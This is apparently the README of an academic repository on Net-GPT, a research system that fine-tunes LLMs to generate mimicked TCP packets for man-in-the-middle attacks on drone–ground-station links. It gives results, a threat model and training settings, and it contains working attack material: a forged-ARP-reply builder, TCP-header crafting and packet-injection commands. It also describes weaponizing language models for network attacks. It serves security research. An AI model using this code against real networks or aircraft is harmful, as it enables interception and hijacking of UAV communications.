
Net-GPT

A LLM-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle


Brett Piggott1  ·  Siddhant Patil2  ·  Guohuan Feng1  ·  Ibrahim Odat1  ·  Rajdeep Mukherjee1  ·  Balakrishnan Dharmalingam1  ·  Anyi Liu1
1Oakland University    2University of Wisconsin–Madison

Overview · Key Results · Architecture · Quick Start · Attacks · Fine-Tuning · Structure · Citation


🔥 News

  • [Dec 2023] 🏆  Paper presented at IEEE/ACM SEC 2023 — Symposium on Edge Computing, Wilmington, DE
  • [Nov 2023] 📄  Paper accepted at SEC'23 — Full research paper · DOI: 10.1145/3583740.3626809
  • [2023] 🔬  Research artifact and codebase publicly released

📖 Overview

"The convergence of Large Language Models with security systems transforms cybersecurity in the AI landscape."

Net-GPT is a research framework demonstrating a novel class of LLM-empowered offensive cyber-physical attacks against Unmanned Aerial Vehicle (UAV) communication systems. The system shows how fine-tuned Large Language Models can be weaponized to:

  • 🎯 Understand network protocols — LLMs learn TCP session structure through QLoRA fine-tuning on real packet captures
  • 🔀 Launch Man-in-the-Middle attacks — Adversarial UAVs intercept and impersonate benign UAV↔GCS communication
  • 📡 Generate mimicked network packets — Context-aligned counterfeit TCP packets generated in real-time via an edge server
  • ⚡ Enable edge-computing deployment — Smaller LLMs (Distil-GPT-2) achieve a 47× faster response time while retaining ~78% of the larger model's prediction capability

Threat Model

The adversary operates a malicious UAV that joins the same network as a benign UAV and its Ground Control Station (GCS). The malicious UAV leverages a nearby edge server equipped with fine-tuned LLMs to:

  1. Hijack the benign UAV via ARP poisoning, session hijacking, or de-authentication attacks
  2. Impersonate both endpoints by generating realistic TCP packets using LLM inference
  3. Maintain persistent session control using signaling packets (delayed ACK, DupACK, Keep-Alives)
 ┌──────────────┐         ┌──────────────┐         ┌──────────────┐
 │  Benign UAV  │◄───────►│ Malicious UAV│◄───────►│     GCS      │
 │   (Target)   │  MITM   │  (Attacker)  │  MITM   │  (Victim)    │
 └──────────────┘         └──────┬───────┘         └──────────────┘
                                 │
                          ┌──────▼───────┐
                           │ Edge Server  │
                           │ (RTX 4090)   │
                           │ Fine-tuned   │
                           │ LLM Engine   │
                          └──────────────┘

📊 Key Results

Generative Accuracy — Packet Field Prediction

| Model | Parameters | Overall Accuracy | Response Time |
|---|---|---|---|
| Llama-2-13B | 13B | 95.3% | 108.3 s |
| Llama-2-7B | 7B | 94.1% | — |
| GPT-2 | 137M | 74.2% (of 13B) | 5.18 s (21× faster) |
| Distil-GPT-2 | 82M | 77.9% (of 7B) | 2.31 s (47× faster) |

Per-Field Prediction Accuracy (Llama-2-13B, Best Config)

| Field | Src IP | Dst IP | Src Port | Dst Port | Flags | Seq# | Ack# | Length |
|---|---|---|---|---|---|---|---|---|
| Accuracy | 98.9% | 98.9% | 98.9% | 98.9% | 83.4% | 96.2% | 91.0% | 99.0% |

Error Analysis (Llama-2-13B)

| Error Count | 0 errors | 1 error | 2 errors | 3–5 errors | 6+ errors |
|---|---|---|---|---|---|
| Rate | 76.2% | 20.3% | 1.9% | 0% | 1.6% |

Over 76% of generated packets are error-free. When errors occur, 96.5% involve only a single field — easily correctable by the adversary.
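The per-field scoring behind these tables reduces to counting mismatched fields between a generated packet and ground truth. The sketch below is an illustrative guess at what src/inference/evaluate.py computes with only the stdlib, not the repo's actual code:

```python
from collections import Counter

# The eight packet fields scored in the per-field evaluation above.
FIELDS = ["Src_IP", "Dst_IP", "Src_Port", "Dst_Port",
          "Flag", "Seq", "Ack", "Length"]

def field_errors(predicted: dict, truth: dict) -> int:
    """Number of fields where the generated packet disagrees with ground truth."""
    return sum(predicted.get(f) != truth.get(f) for f in FIELDS)

def error_histogram(pairs) -> Counter:
    """Bucket packets by error count, as in the error-analysis table."""
    return Counter(field_errors(p, t) for p, t in pairs)
```

A generated packet that differs from ground truth only in Seq scores one error and lands in the "1 error" bucket.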

Cost-Efficiency: Dataset Size vs. Training Epochs

| Combination | Dataset | Epochs | Accuracy (13B) | Accuracy (7B) |
|---|---|---|---|---|
| Best | 100K | 2 | 96.5% | 97.0% |
| Medium | 60K | 3 | 96.0% | 96.2% |
| Low | 20K | 10 | 93.5% | 92.8% |

Larger datasets with fewer epochs consistently outperform smaller datasets with more epochs — a key insight for edge-computing deployment strategies.


🏗️ System Architecture

Net-GPT operates in a two-phase attack pipeline:

Phase 1 — UAV Hijacking

Six attack methods targeting the PX4 autopilot communication layer:

| Attack Method | Description |
|---|---|
| MAC Spoofing | Layer 2 impersonation |
| Session Hijacking | TCP session takeover |
| ARP Poisoning | ARP cache corruption |
| Packet Injection | Crafted packet insertion |
| Flooding Attack | Resource exhaustion |
| De-authentication | WiFi disassociation |

Phase 2 — LLM-Powered Packet Generation

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        FINE-TUNING PIPELINE                         │
 │                                                                     │
 │  Raw PCAP  ──►  tshark extract  ──►  JSON format  ──►  QLoRA tune  │
 │  (bigFlows)     (TCP sessions)      (#Previous,      (NF4 quant,   │
 │  368 MB         6,971 sessions      #Predicted,       8 batch,     │
 │  791K packets   100K packets        #Context)         2e-4 LR)     │
 └─────────────────────────────────────────────────────────────────────┘

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        INFERENCE PIPELINE                           │
 │                                                                     │
 │  Intercepted  ──►  Edge Server  ──►  Fine-tuned  ──►  Scapy craft  │
 │  TCP packet       (RTX 4090)        LLM predict       Inject on    │
 │  from session     Format query      next packet       network      │
 └─────────────────────────────────────────────────────────────────────┘

Fine-Tuning Data Format

Each training entry follows a structured three-section template:

{
  "#Previous_Packet": {
    "Src_IP": "192.168.1.10",
    "Dst_IP": "192.168.1.20",
    "Src_Port": "54321",
    "Dst_Port": "80",
    "Flag": "ACK",
    "Seq": "1001",
    "Ack": "2001",
    "Length": "512"
  },
  "#Predicted_Packet": {
    "Src_IP": "192.168.1.20",
    "Dst_IP": "192.168.1.10",
    "Src_Port": "80",
    "Dst_Port": "54321",
    "Flag": "ACK PSH",
    "Seq": "2001",
    "Ack": "1513",
    "Length": "1024"
  },
  "#Context": "TCP_SESSION_ID:7042"
}
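Generating such entries from an extracted session reduces to sliding a two-packet window over the session's packet list. A minimal stdlib sketch (the helper names are illustrative, not the repo's):

```python
def to_entry(prev: dict, nxt: dict, session_id: int) -> dict:
    """Pair two consecutive packets of one TCP session into the
    #Previous_Packet / #Predicted_Packet / #Context template above."""
    return {
        "#Previous_Packet": prev,
        "#Predicted_Packet": nxt,
        "#Context": f"TCP_SESSION_ID:{session_id}",
    }

def session_to_entries(packets: list, session_id: int) -> list:
    """One training entry per adjacent packet pair, preserving order."""
    return [to_entry(a, b, session_id) for a, b in zip(packets, packets[1:])]
```

A session of n packets therefore yields n−1 training entries.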

⚡ Quick Start

Requirements

| Dependency | Version | Purpose |
|---|---|---|
| Python | ≥ 3.10 | Runtime |
| PyTorch | ≥ 2.0 | Model training & inference |
| Transformers | ≥ 4.31 | Hugging Face model loading |
| PEFT | ≥ 0.4 | QLoRA fine-tuning |
| bitsandbytes | ≥ 0.40 | NF4 quantization |
| Scapy | ≥ 2.5 | Network packet crafting |
| tshark | ≥ 3.0 | PCAP parsing |
| CUDA | ≥ 11.8 | GPU acceleration |

1. Clone & Install

git clone https://github.com/OdatSec/Net-GPT.git
cd Net-GPT
pip install -r requirements.txt

2. Prepare Dataset

# Download and extract TCP sessions from PCAP
python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/bigFlows.pcap \
    --output data/processed/train.json \
    --max-packets 100000

python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/smallFlows.pcap \
    --output data/processed/test.json

3. Fine-Tune a Model

# Fine-tune Llama-2-13B with QLoRA (default config)
python src/fine_tuning/qlora_trainer.py \
    --model meta-llama/Llama-2-13b-hf \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/llama2-13b-netgpt

# Fine-tune Distil-GPT-2 (edge deployment)
python src/fine_tuning/qlora_trainer.py \
    --model distilgpt2 \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/distilgpt2-netgpt

4. Run Inference

# Generate predicted packets from intercepted sessions
python src/inference/predict.py \
    --model models/llama2-13b-netgpt \
    --input data/processed/test.json \
    --output results/predictions_llama2_13b.json

5. Evaluate Results

# Per-field accuracy evaluation
python src/inference/evaluate.py \
    --predictions results/predictions_llama2_13b.json \
    --ground-truth data/processed/test.json \
    --output results/evaluation_llama2_13b.json

6. Craft & Inject Packets (Controlled Lab Only)

# Generate Scapy-compatible packets from predictions
python src/packet_crafting/craft_packets.py \
    --predictions results/predictions_llama2_13b.json \
    --interface eth0
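craft_packets.py builds its frames with Scapy. Purely as an illustration of what a predicted packet maps onto at the byte level, here is the standard 20-byte TCP header assembled with the stdlib; the field values come from the JSON example earlier, and the flag-bit mapping is RFC 793, not repo code:

```python
import struct

# TCP flag bits (RFC 793)
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10}

def tcp_header(src_port, dst_port, seq, ack, flags, window=65535):
    """Build a minimal 20-byte TCP header. The checksum is left 0 here;
    Scapy (or the kernel) fills it in during a real injection."""
    flag_byte = 0
    for name in flags.split():
        flag_byte |= FLAG_BITS[name]
    data_offset = 5 << 4            # 5 * 4 = 20-byte header, no options
    return struct.pack("!HHLLBBHHH",
                       src_port, dst_port, seq, ack,
                       data_offset, flag_byte, window, 0, 0)

# Values from the "#Predicted_Packet" example above
hdr = tcp_header(80, 54321, 2001, 1513, "ACK PSH")
```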

🔬 Fine-Tuning Methodology

QLoRA Configuration

| Parameter | Value |
|---|---|
| Quantization | NF4 (nf4) |
| Batch size/device | 8 |
| Gradient steps | 12 |
| Paged optimizer | paged_adamw_32bit |
| Scheduler | constant |
| Logging steps | 10 |
| Learning rate | 2e-4 |
| Global grad norm | 0.3 |
| Warm-up ratio | 0.03 |
| Epochs | 1–10 |
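Under the usual Hugging Face stack (transformers + peft + bitsandbytes), the table translates roughly into the following configuration objects. The LoRA rank, alpha, dropout, and output path are illustrative assumptions; only the quantization, batch, optimizer, and schedule settings come from the table:

```python
import torch
from transformers import BitsAndBytesConfig, TrainingArguments
from peft import LoraConfig

# NF4 4-bit quantization (bitsandbytes), per the table
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,
)

# LoRA adapter — r/alpha/dropout are assumptions, not table values
lora_config = LoraConfig(r=64, lora_alpha=16, lora_dropout=0.1,
                         task_type="CAUSAL_LM")

training_args = TrainingArguments(
    output_dir="models/netgpt",          # hypothetical path
    per_device_train_batch_size=8,
    gradient_accumulation_steps=12,      # "Gradient steps" in the table
    learning_rate=2e-4,
    max_grad_norm=0.3,
    warmup_ratio=0.03,
    lr_scheduler_type="constant",
    logging_steps=10,
    num_train_epochs=2,
    optim="paged_adamw_32bit",
)
```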

Models Evaluated

| Model | Parameters | HuggingFace ID | Use Case |
|---|---|---|---|
| Llama-2-13B | 13B | meta-llama/Llama-2-13b-hf | High-accuracy server deployment |
| Llama-2-7B | 7B | meta-llama/Llama-2-7b-hf | Balanced accuracy/speed |
| GPT-2 | 137M | gpt2 | Compact edge deployment |
| Distil-GPT-2 | 82M | distilgpt2 | Ultra-fast edge deployment |

Dataset Statistics

| Property | Fine-Tuning (bigFlows) | Testing (smallFlows) |
|---|---|---|
| Size | 368 MB | 9.4 MB |
| Packets | 791,615 | 14,261 |
| Flows | 40,686 | 1,209 |
| Applications | 132 | 28 |
| Avg. Packet Size | 449 bytes | 646 bytes |
| Duration | 5 minutes | 5 minutes |

🛡️ Attack Pipeline

ARP Poisoning — Layer 2 cache corruption

Corrupts ARP tables on both the target UAV and GCS, redirecting traffic through the malicious UAV. The attacker becomes an invisible relay, enabling full packet interception and modification.
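The repo's arp_poisoning.py presumably crafts these frames with Scapy; as a stdlib-only illustration of the unsolicited ARP reply such an attack sends (a sketch, not the repo's implementation):

```python
import struct
import socket

def forged_arp_reply(attacker_mac: bytes, victim_mac: bytes,
                     spoofed_ip: str, victim_ip: str) -> bytes:
    """Raw Ethernet frame carrying an unsolicited ARP reply that binds
    spoofed_ip to the attacker's MAC in the victim's ARP cache."""
    eth = victim_mac + attacker_mac + b"\x08\x06"        # EtherType 0x0806 = ARP
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)      # Ethernet/IPv4, opcode 2 (reply)
    arp += attacker_mac + socket.inet_aton(spoofed_ip)   # sender: attacker posing as spoofed_ip
    arp += victim_mac + socket.inet_aton(victim_ip)      # target: the victim
    return eth + arp

frame = forged_arp_reply(b"\xaa" * 6, b"\xbb" * 6, "192.168.1.20", "192.168.1.10")
```

Sending one such frame to each endpoint, with the roles swapped, places the attacker in the middle of both directions of the session.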

Session Hijacking — TCP session takeover

Exploits the TCP three-way handshake to inject the attacker into an established session. Semi-session and full-session variants allow partial or complete control of the communication channel.

De-authentication — WiFi disassociation attack

Forces the benign GCS to disconnect from the network by sending spoofed de-authentication frames. The malicious UAV then establishes itself as the communication partner.

Packet Injection — Crafted packet insertion

After establishing MITM position, the adversary uses the fine-tuned LLM to generate and inject context-aligned TCP packets that mimic legitimate UAV↔GCS communication patterns.


📁 Repository Structure

Net-GPT/
│
├── 📂 src/                              Source code package
│   ├── data_preprocessing/
│   │   ├── pcap_extractor.py           Extract TCP sessions from PCAP files
│   │   ├── session_parser.py           Parse and structure TCP sessions
│   │   └── json_formatter.py           Format data for fine-tuning
│   │
│   ├── fine_tuning/
│   │   ├── qlora_trainer.py            QLoRA fine-tuning pipeline
│   │   ├── dataset_loader.py           Custom dataset for packet prediction
│   │   └── train_config.py             Training hyperparameter configs
│   │
│   ├── inference/
│   │   ├── predict.py                  Generate packet predictions
│   │   ├── evaluate.py                 Per-field accuracy evaluation
│   │   └── benchmark.py                Response time benchmarking
│   │
│   ├── attacks/
│   │   ├── arp_poisoning.py            ARP cache poisoning implementation
│   │   ├── session_hijack.py           TCP session hijacking
│   │   ├── deauth_attack.py            WiFi de-authentication
│   │   └── mitm_controller.py          MITM orchestration engine
│   │
│   └── packet_crafting/
│       ├── craft_packets.py            Scapy-based packet construction
│       └── session_replayer.py         TCP session replay engine
│
├── 📂 configs/
│   ├── qlora_llama2_13b.yaml          Llama-2-13B fine-tuning config
│   ├── qlora_llama2_7b.yaml           Llama-2-7B fine-tuning config
│   ├── qlora_gpt2.yaml                GPT-2 fine-tuning config
│   └── qlora_distilgpt2.yaml          Distil-GPT-2 fine-tuning config
│
├── 📂 data/
│   ├── raw/                           Raw PCAP captures (user-supplied)
│   └── processed/                     Processed JSON for training/testing
│
├── 📂 models/                          Fine-tuned model checkpoints
│
├── 📂 results/                         Experiment outputs and evaluations
│
├── 📂 figures/                         Paper figures and visualizations
│
├── 📂 docs/
│   ├── METHODOLOGY.md                 Detailed methodology documentation
│   ├── RESULTS.md                     Comprehensive results tables
│   └── EDGE_DEPLOYMENT.md             Edge computing deployment guide
│
├── 📂 scripts/
│   ├── run_all_experiments.sh         Reproduce all paper results
│   ├── evaluate_all_models.sh         Batch evaluation script
│   └── download_dataset.sh            Dataset download helper
│
├── .gitignore                         Git ignore rules
├── CITATION.cff                       Machine-readable citation metadata
├── CONTRIBUTING.md                    Contribution guidelines
├── LICENSE                            MIT License
├── README.md                          This file
├── SECURITY.md                        Security policy & responsible use
└── requirements.txt                   Python dependencies

📐 Research Questions & Findings

The paper systematically investigates three research questions:

RQ1: Does model size significantly improve effectiveness?

Finding: Llama-2-13B (95.3%) marginally outperforms Llama-2-7B (94.1%). The 1.2-point gap is surprisingly small given the ~2× parameter difference, suggesting that model architecture matters more than raw parameter count for protocol-understanding tasks.

RQ2: What balances dataset quantity vs. training epochs?

Finding: 100K packets with 2 epochs produces the best accuracy for both models. Larger datasets markedly improve Flags-field prediction — critical for sustaining communication sessions. Additional epochs do not help smaller LLMs and may even degrade performance.

RQ3: Can smaller LLMs produce comparable results?

Finding: Distil-GPT-2 (82M params) achieves 77.9% of Llama-2-7B's prediction capability while responding 47× faster than Llama-2-13B (2.31 s vs. 108.3 s). This enables real-time edge deployment on resource-constrained mobile platforms — crucial for adversarial field operations.


🔄 Reproducibility

All experiments are fully reproducible:

# Reproduce all paper results end-to-end
bash scripts/run_all_experiments.sh

# Reproduce specific model evaluation
python src/inference/evaluate.py \
    --model-name llama2-13b \
    --dataset-sizes 20000 40000 60000 80000 100000 \
    --epochs 1

| Artifact | Path | Description |
|---|---|---|
| Training data | data/processed/train.json | 100K packets from bigFlows |
| Test data | data/processed/test.json | 14,261 packets from smallFlows |
| Model configs | configs/*.yaml | QLoRA hyperparameters per model |
| Results | results/ | Per-field accuracy JSON per experiment |

⚠️ Ethics & Responsible Use

All experiments were conducted in an isolated laboratory environment with UAVs operating under the PX4 autopilot simulation framework. No real airspace, operational networks, production UAV systems, or public wireless infrastructure was involved at any stage of this research.

The attack implementations in this repository are disclosed as part of responsible academic vulnerability research demonstrating how adversarial LLM capabilities extend to network-level physical systems. The intent is to motivate the design of LLM-aware network security defenses for UAV communication infrastructure.

⛔ Do not deploy any attack component against real aircraft, live airspace, operational networks, or systems you do not own and have explicit authorization to test.

This research was reviewed and approved by the institutional review process at Oakland University.

See SECURITY.md for the full security policy.


📝 Citation

If Net-GPT contributes to your research, please cite:

@inproceedings{piggott2023netgpt,
  title     = {{Net-GPT}: A {LLM}-Empowered Man-in-the-Middle Chatbot for
               Unmanned Aerial Vehicle},
  author    = {Piggott, Brett and Patil, Siddhant and Feng, Guohuan and
               Odat, Ibrahim and Mukherjee, Rajdeep and
               Dharmalingam, Balakrishnan and Liu, Anyi},
  booktitle = {Proceedings of the 2023 IEEE/ACM Symposium on Edge Computing (SEC)},
  year      = {2023},
  pages     = {287--293},
  publisher = {ACM},
  address   = {Wilmington, DE, USA},
  doi       = {10.1145/3583740.3626809},
  isbn      = {979-8-4007-0123-8}
}

A CITATION.cff file is included for GitHub's automatic citation tool.


🔗 Related Work

Project Venue Relationship
AeroMind RAID 2026 Memory-poisoning attacks on LLM-driven UAV agents (follow-up work)
Heterogeneous Generative Dataset for UASes IEEE MOST 2023 Foundational UAV dataset work

📬 Contact

Author Affiliation Role
Brett Piggott Oakland University Lead developer
Siddhant Patil University of Wisconsin–Madison Contributor
Guohuan Feng Oakland University Contributor
Ibrahim Odat Oakland University Contributor
Rajdeep Mukherjee Oakland University Contributor
Balakrishnan Dharmalingam Oakland University Contributor
Anyi Liu Oakland University Principal Investigator

Net-GPT · IEEE/ACM SEC 2023 · Oakland University · University of Wisconsin–Madison
Released under the MIT License
